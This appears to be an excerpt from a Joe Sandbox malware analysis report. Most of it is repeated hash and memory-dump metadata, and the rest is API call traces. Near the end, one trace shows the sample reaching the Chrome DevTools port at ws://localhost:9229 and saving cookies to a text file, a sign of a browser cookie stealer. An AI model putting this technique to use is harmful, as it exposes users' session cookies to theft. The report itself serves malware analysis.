                                                                                                • Opcode Fuzzy Hash: 87a3deadb9d58158e10bd0d13bb27e12a41fb1a60a956b8ee286a92c2821ca3b
                                                                                                • Instruction Fuzzy Hash: EE21D331A081098FD718CFAAC8D06DEB7F2EF9A304F25C039D815E7218E6B0E915CB60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 97cbfa6a907e55dae8401866b1d15889492c98cb2e246ce72649cc570ac47a2c
                                                                                                • Instruction ID: 3be14e853f6d6f7a8a57e59baf3aa0a0bffb859339050ea86f3e3846f1c49e98
                                                                                                • Opcode Fuzzy Hash: 97cbfa6a907e55dae8401866b1d15889492c98cb2e246ce72649cc570ac47a2c
                                                                                                • Instruction Fuzzy Hash: 80012878A046559FCB00DFA9C4D095EBBF5FF89724B24C46AEA488B314C738E851CB92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ba9cc90e5a21082ad6c2295b21ce38250c8b9c469be8e37a4c4f460e4ebd293f
                                                                                                • Instruction ID: f77352582697cf63471e0c4c8f40e3a4f494cd20e5c99f7e715a2ca9bff404d5
                                                                                                • Opcode Fuzzy Hash: ba9cc90e5a21082ad6c2295b21ce38250c8b9c469be8e37a4c4f460e4ebd293f
                                                                                                • Instruction Fuzzy Hash: 4C01F93A904650CFC7009F65C4C0699BBB5FF85319F19C16ADC584F346D734D592CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0c3ebf914bd4d94a51e339c97bb43ea5b9a0e5b7f07c667420d66bd9099e7be
                                                                                                • Instruction ID: 23c8173731f4f8750f7e82a0d5cf473f1c368e3d07a63e1643a5bca77f02800b
                                                                                                • Opcode Fuzzy Hash: e0c3ebf914bd4d94a51e339c97bb43ea5b9a0e5b7f07c667420d66bd9099e7be
                                                                                                • Instruction Fuzzy Hash: 18014B74A003469BD704DF6AC4C4A4AFBB4FF88368F14C669D8088B301D374E995CBD0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 603a9ca93cbafb1f4181249a4d705fd8964dc025393484f8e9e5c12118581de5
                                                                                                • Instruction ID: 683273e64459584920a51cd19a7e4d80a31ac76df9d38907cb404440e2cf26f0
                                                                                                • Opcode Fuzzy Hash: 603a9ca93cbafb1f4181249a4d705fd8964dc025393484f8e9e5c12118581de5
                                                                                                • Instruction Fuzzy Hash: BDF05E79A0020A9FCB00DF69D9C088EB7F9FF89224B24C065ED089B305D334E952CF91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fec887b937182efdeb275cf1860c59da708b12e60ecbd0d81ba91b53eac5727a
                                                                                                • Instruction ID: 44e553df0f6153727c0ccd70e02d170a2b8fbf64feb92f11989a6743949971bc
                                                                                                • Opcode Fuzzy Hash: fec887b937182efdeb275cf1860c59da708b12e60ecbd0d81ba91b53eac5727a
                                                                                                • Instruction Fuzzy Hash: 64F08934604619DBCB00EF99EDC489EBBB4FF49264F10C495ED948B354DB30D86587D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 14736fa9179efb67357d4d22b433410e97ebfd633caaa68a2b1c40438b902975
                                                                                                • Instruction ID: 20361dabe9e5e624aead0c2cbcda463e1dc5d30ecc087adce6a46ccbc9e5f0dc
                                                                                                • Opcode Fuzzy Hash: 14736fa9179efb67357d4d22b433410e97ebfd633caaa68a2b1c40438b902975
                                                                                                • Instruction Fuzzy Hash: 01F01C310186858BD7098B689466BA0BFE4AB02328F28C7F9E86D0F7D7C67195C4C790
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f6dac371d744d1f4a74433f500022962c81eca0c7d3a4d374c1a06fb4a0a0243
                                                                                                • Instruction ID: 49fe5c7db6ee1c100769216236de79f0150f8c1617bfc082eb282041d978b41e
                                                                                                • Opcode Fuzzy Hash: f6dac371d744d1f4a74433f500022962c81eca0c7d3a4d374c1a06fb4a0a0243
                                                                                                • Instruction Fuzzy Hash: A4F04EB9A4535D9FDB00CF0AD8C1ADABBA8FB0C260F94811AFE1857341C274A9508BE1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 80444b7a1f9c336b8ddf7ede844ef2572c4fef74faff3e978b08c37b414cddcf
                                                                                                • Instruction ID: 214e4a77422a75c172c9c2064a368b9d1fba0603b708cc731de69edf92eb1139
                                                                                                • Opcode Fuzzy Hash: 80444b7a1f9c336b8ddf7ede844ef2572c4fef74faff3e978b08c37b414cddcf
                                                                                                • Instruction Fuzzy Hash: EEE0E678A042495FDB00DF65D4C054AB7B5FF48258B24C165DD484B305D231E995CBC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7741dc5002cb162032dfd22e15b2f11181b9a78a06ce5ec405677c32640a3b74
                                                                                                • Instruction ID: 0770371ec9a44e43cdd5cf4ef26b08e67e6dab9ce041578c4bbee247c5ef0355
                                                                                                • Opcode Fuzzy Hash: 7741dc5002cb162032dfd22e15b2f11181b9a78a06ce5ec405677c32640a3b74
                                                                                                • Instruction Fuzzy Hash: 54E0B6B550531DAFCB00CF09D8849CABBA8FB08260F10811AFD145B301C371E910CBE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                                • Instruction ID: e794d2b72a1fc6c6090aef49fcd2ae8b4ab6f64d521491744c60cc3bf2b3839a
                                                                                                • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                                                                • Instruction Fuzzy Hash: 8ED092B8909349AFCB00EF29C48544EBBE4BF88258F40C82DFC98C7311E274E8408F92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
                                                                                                • Instruction ID: de6271d013a038b850d850acc4260bf908e6486e870890920c4c51f453ae2ee2
                                                                                                • Opcode Fuzzy Hash: c758f56ce800b0edb1a3b6b4920dd8d203c929418ffadd695cc457fe8d80d330
                                                                                                • Instruction Fuzzy Hash: C7B0123B11030CCB4700DD0DD441CC1B3D8F708E127C104D0E41087701D669F800C685
                                                                                                APIs
                                                                                                  • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                                                                                • memset.MSVCRT ref: 00409C33
                                                                                                • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                                                                                • connect_to_websocket.CHROME(?,00000000), ref: 00409C76
                                                                                                • memset.MSVCRT ref: 00409C9A
                                                                                                • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                                                                                • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                                                                                • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                                                                                • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • memset.MSVCRT ref: 00409D7E
                                                                                                • free_result.CHROME(00000000), ref: 00409D8B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$memset$lstrlen$InternetOpenconnect_to_websocketfree_resultlstrcpy
                                                                                                • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                                                                                • API String ID: 2548846003-3542011879
                                                                                                • Opcode ID: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
                                                                                                • Instruction ID: 9597081ec4872356d8a1e20e182716cfae729ad967be985c4dfb38bd464ab4a8
                                                                                                • Opcode Fuzzy Hash: 0f4eae4b186cbd02d04a961c8613f19afe80490064d29fcc716c48ba3c8a2736
                                                                                                • Instruction Fuzzy Hash: 74516D71D10518ABCB14EBA0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                  • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
                                                                                                • lstrcatA.KERNEL32(?,00000000,0096C2E8,0042156C,0096C2E8,00421568,00000000), ref: 0040D308
                                                                                                • lstrcatA.KERNEL32(?,00421570), ref: 0040D317
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
                                                                                                • lstrcatA.KERNEL32(?,00421574), ref: 0040D339
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
                                                                                                • lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
                                                                                                • lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D390
                                                                                                • lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                                                                                • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                                                                                • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                                                                                • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                                                                                  • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                  • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                • lstrlenA.KERNEL32(?), ref: 0040D42A
                                                                                                • lstrlenA.KERNEL32(?), ref: 0040D439
                                                                                                • memset.MSVCRT ref: 0040D488
                                                                                                  • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
